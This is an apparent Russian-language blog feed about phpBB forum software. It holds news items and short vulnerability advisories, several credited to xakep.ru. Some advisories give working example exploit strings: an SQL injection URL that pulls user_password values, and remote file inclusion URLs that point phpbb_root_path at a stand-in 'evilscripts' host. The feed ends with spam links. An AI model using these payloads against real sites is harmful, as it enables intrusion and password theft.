tag:blogger.com,1999:blog-45575826961064713102011-04-22T01:54:54.928+06:00Доступно о форуме phpBB. Новости, моды, скины и стили. Уязвимости. Рекомендации.SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comBlogger221100tag:blogger.com,1999:blog-4557582696106471310.post-64198673358605504352007-04-01T22:52:00.000+06:002007-04-01T22:56:11.457+06:00

Уязвимость позволяет пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «c» сценарием forum.php. Пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.Пример: forum.php?c=-1/**/UNION/**/SELECT/* */0,1,2,3,4,user_password,6/**/

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-40392358568265962592007-03-20T22:45:00.000+05:002007-03-20T22:49:08.196+05:00

Починить то починили, только файлы со всякими приблудами пока еще 404-ю ошибку возвращают.Зато новый дизайн сайта радует! :-)Молодцы!

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-59736201135127496432007-03-14T23:27:00.000+05:002007-03-14T23:32:17.268+05:00

Итак, у вас есть форум. Причем не просто форум, а посещаемый. Что дальше?Дальше его нужно развивать. Для этого нужны деньги. Где их взять? Все просто - вы уже обладаете ресурсом по их получению. Нужно только правильно организовать процесс. Об этом хорошо рассказывает мой друг - автор сайта Интернет-бизнес: идеи бизнеса.

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-87076399109391763092007-03-11T19:17:00.000+05:002007-03-14T21:37:53.532+05:00

Судя по тексту вышло из строя сразу 2 диска в RAID. Пострадала в основном CVS, информацию в которой еще восстанавливать и восстанавливать. Сам сайт обещают починить в ближайшее время.

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-34940565861382840422007-02-27T22:44:00.000+05:002007-03-04T23:00:01.850+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием includes/functions_nomoketos_rules.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.Источник: xakep.ru

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-38372910977367596292007-02-27T22:42:00.000+05:002007-03-04T22:59:35.248+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием includes/functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.Пример: /includes/functions.php?phpbb_root_path=http://evilscripts?Источник:

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-60723718812968798492007-02-16T22:39:00.000+05:002007-03-04T22:59:21.714+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе.Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии includes/functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-76806695205239474472007-02-06T23:11:00.000+05:002007-02-23T18:45:48.254+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием class_template.php. Пользователь пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.Пример: /includes/class_template.php?phpbb_root_path=http://

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-7107220926535602832007-02-05T20:14:00.000+05:002007-02-23T18:49:31.170+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии includes/functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-17372681604732048622007-02-01T23:15:00.000+05:002007-02-23T18:51:05.118+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием portal.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.Пример: /portal/portal.php?phpbb_root_path=http://evilscripts?Источник: xakep.ru

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-53438677282484537262007-01-31T23:20:00.000+05:002007-02-23T18:52:50.143+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.Пример: /includes/functions.php?phpbb_root_path=http://evilscripts?Источник: xakep.ru

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-48109752990678949302007-01-30T23:21:00.000+05:002007-02-23T18:54:57.923+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценариях admin/admin_linkdb.php, admin/admin_forum_prune.php, admin/admin_extensions.php, admin/admin_board.php, admin/admin_attachments.php и admin/admin_users.php. Пользователь может выполнить произвольный

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-73579700222431236102007-01-29T17:23:00.000+05:002007-02-23T18:55:43.209+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.Источник: xakep.ru

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-51095201492147511032007-01-26T19:40:00.000+05:002007-02-23T18:58:15.418+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием vp/configure.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.Пример: /vp/configure.php?phpbb_root_path=http://evilscripts?Источник: xakep.ru

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-8321057973866388042006-12-26T23:01:00.000+05:002007-02-23T18:57:51.152+05:00

Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" сценарием archive_topic.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.Пример: /includes/archive/archive_topic.php?phpbb_root_path=http://evil_scripts?

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-36853495235614879762006-12-25T16:48:00.000+05:002007-02-06T23:44:22.885+05:00

В новый релиз включено много полезных исправлений по части безопасности, например так называемая плавающая ошибка XSS в системе личных сообщений. Со всеми изменениями вы можете ознакомиться здесь (на русском). Там же есть ссылка на дистрибутив.

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-48040451581534864082006-12-09T23:30:00.000+05:002007-02-23T18:58:56.665+05:00

Обнаружена уязвимость в phpBB последней версии 2.0.21. Удаленный пользователь может произвести XSS нападение и CSRF атаку. Как видно из сообщения об уязвимости, XSS нападение возможно через сервис личных сообщений (private messages).Опасность: Низкая.Способов устранения уязвимости на данный момент не существует.

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-85318261847193854052006-11-28T22:44:00.001+05:002006-11-28T22:44:48.527+05:00

Что делать, если вы не понимаете как что-то сделать? Прочтите руководство.Не помогло? Тогда вам нужно посмотреть список наиболее часто встречающихся вопросов.И это не помогло? Тогда максимально четко опишите проблему и вперед, на форум.

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-56257021286679356782006-11-26T21:59:00.001+05:002006-11-26T21:59:09.341+05:00

Уж сколько раз твердили миру... тем не менее находятся люди (особенно обидно, если это хостеры), которые все еще включают на хостинге register_globals. Данная проблема хорошо описана на сайте PHP, причем с примерами взлома, причем в 2003 году! Тем не менее через эту дырку постоянно ломают сайты.В статье "Поиск PHP уязвимостей на примере phpBB" прекрасно описан процесс взлома с использованием этой

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-50052122569757910812006-11-25T22:41:00.001+05:002006-11-25T22:41:53.580+05:00

Это форум, написаный на языке PHP и использующий для хранения данных СУБД, чаще всего MySQL. Описание форума phpBB в Википедии.

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-10628528548471706882006-11-25T20:50:00.001+05:002006-11-25T22:19:06.589+05:00

Здесь я буду собирать все важное о форуме phpBB.

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.comtag:blogger.com,1999:blog-4557582696106471310.post-71260432896835134302006-11-11T11:11:00.000+05:002007-03-08T08:56:13.875+05:00

раскрутка сайта и имиджевая рекламаГипермаркет www.torgpred.com: где купить и как заработать? Надежные интернет-магазины и партнерские программыАвтомобили на Promotion.SU. Продажа автомобилей, японские и американские автомобили, подержанные автомобили.Дизайн студия Мосолов.Info - Изготовление интернет сайтов, домашних страниц, банеров, рекламных буклетов для типографии, визиток, логотипов

SirGohttp://www.blogger.com/profile/13960053835361897942noreply@blogger.com